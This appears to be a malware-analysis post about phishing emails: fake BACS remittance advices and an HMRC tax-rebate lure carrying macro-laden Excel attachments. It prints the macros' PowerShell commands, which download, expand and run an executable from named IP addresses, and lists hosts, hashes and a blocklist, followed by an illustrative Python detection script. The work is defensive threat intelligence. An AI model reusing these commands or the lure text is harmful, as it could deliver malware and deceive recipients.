From: Long Fletcher
Date: 11 March 2015 at 09:44
Subject: Remittance Advice
Good Morning,
Please find attached the BACS Remittance Advice for payment made by RENEW HLDGS.
Please note this may show on your account as a payment reference of FPALSDB.
Kind Regards
Long Fletcher
Finance Coordinator
Attachment: LSDB.xls
----------
From: Vaughn Baker
Date: 11 March 2015 at 09:27
Subject: Your Remittance Advice [FPABHKZCNZ]
Good Morning,
Please find attached the BACS Remittance Advice for payment made by JD SPORTS FASHION PLC.
Please note this may show on your account as a payment reference of FPABHKZCNZ.
Kind Regards
Vaughn Baker
Senior Accountant
----------
From: HMRC
Date: 11 March 2015 at 10:04
Subject: Your Tax rebate
Dear [redacted],
After the last yearly computations of your financial functioning we have defined that you have the right to obtain a tax rebate of 934.80. Please confirm the tax rebate claim and permit us have 6-9 days so that we execute it. A rebate can be postponed for a variety of reasons. For instance confirming unfounded data or applying not in time.
To access the form for your tax rebate, view the report attached. Document Reference: (196XQBK).
Regards, HM Revenue Service. We apologize for the inconvenience.
The security and confidentiality of your personal information is important for us. If you have any questions, please either call the toll-free customer service phone number.
© 2014, all rights reserved
Sample attachment names:
HMRC: 196XQBK.xls, 89WDZ.xls
BACS: LSDB.xls, Rem_8392TN.xml (note that this is actually an Excel document, not an XML file)
All of these documents have low detection rates [1] [2] [3] [4] and contain very similar malicious macros (which include sandbox-detection logic) [1] [2] [3] [4]; once decrypted, the macros attempt to run the following PowerShell commands:
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://193.26.217.39/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://93.170.123.36/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://85.143.166.190/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://46.30.42.177/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;
These are probably compromised hosts; for the record they are:
193.26.217.39 (Servachok Ltd, Russia)
93.170.123.36 (PE Gornostay Mikhailo Ivanovich, Ukraine)
85.143.166.190 (Pirix, Russia)
46.30.42.177 (EuroByte / Webazilla, Russia)
These commands download a CAB file, expand it and execute the resulting EXE. That EXE has a detection rate of 4/57, and automated analysis tools [1] [2] show attempted traffic to:
95.163.121.33 (Digital Networks aka DINETHOSTING, Russia)
188.120.226.6 (TheFirst.RU, Russia)
188.165.5.194 (OVH, France)
According to this Malwr report it drops two further malicious files with the following MD5s:
c6cdf73eb5d11ac545f291bc668fd7fe
8d3a1903358c5f3700ffde113b93dea6 [VT 2/56]
Recommended blocklist:
95.163.121.0/24
188.120.226.6
188.165.5.194
193.26.217.39
93.170.123.36
85.143.166.190
46.30.42.177
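As an added example (not part of the original post), here is a small triage script that looks for the download / expand / start chain shown in the macro commands above in process-creation log lines and checks whether the contacted host falls inside the recommended blocklist. The log format (pid|image|cmdline) and the sample lines are constructed for illustration.

```python
import ipaddress
import re

# Recommended blocklist from the post: one /24 plus single hosts.
BLOCKLIST = [ipaddress.ip_network(n) for n in (
    "95.163.121.0/24", "188.120.226.6", "188.165.5.194",
    "193.26.217.39", "93.170.123.36", "85.143.166.190", "46.30.42.177",
)]

# The three stages of the macro's one-liner: WebClient download to a .cab,
# expand to an .exe, then start it. Case-insensitive; spacing may vary.
DOWNLOAD_RE = re.compile(
    r"\(New-Object\s+System\.Net\.WebClient\)\.DownloadFile\(\s*'([^']+)'\s*,\s*'([^']+)'\s*\)",
    re.IGNORECASE)
EXPAND_RE = re.compile(r"\bexpand\s+(\S+\.cab)\s+(\S+\.exe)", re.IGNORECASE)
START_RE = re.compile(r"\bstart\s+(\S+\.exe)", re.IGNORECASE)

def analyse_cmdline(cmdline):
    """Describe the dropper chain, or return None if any stage is missing."""
    dl, ex, st = DOWNLOAD_RE.search(cmdline), EXPAND_RE.search(cmdline), START_RE.search(cmdline)
    if not (dl and ex and st):
        return None
    url, cab = dl.group(1), dl.group(2)
    m = re.match(r"https?://([^/:]+)", url, re.IGNORECASE)
    host = m.group(1) if m else url
    # The chain is consistent when the downloaded .cab is the one expanded
    # and the expanded .exe is the one started.
    consistent = (cab.lower() == ex.group(1).lower()
                  and ex.group(2).lower() == st.group(1).lower())
    return {"url": url, "host": host, "cab": cab, "exe": st.group(1),
            "chain_consistent": consistent}

def host_blocklisted(host):
    """True if host is an IP literal covered by BLOCKLIST (ranges included)."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # hostnames are not matched here
    return any(ip in net for net in BLOCKLIST)

def triage(log_lines):
    """Return one hit per log line (constructed 'pid|image|cmdline') matching the chain."""
    hits = []
    for line in log_lines:
        pid, image, cmdline = line.split("|", 2)
        info = analyse_cmdline(cmdline)
        if info:
            info.update(pid=pid, image=image, blocklisted=host_blocklisted(info["host"]))
            hits.append(info)
    return hits

# Constructed sample log: one command from the post and one benign admin command.
SAMPLE_LOG = [
    "4120|cmd.exe|cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://193.26.217.39/asdvx/fghs.php','%TEMP%\\dsfsdFFFv.cab'); expand %TEMP%\\dsfsdFFFv.cab %TEMP%\\dsfsdFFFv.exe; start %TEMP%\\dsfsdFFFv.exe;",
    "4188|powershell.exe|PowerShell.exe Get-ChildItem C:\\Users\\staff\\Documents",
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print(hit)
```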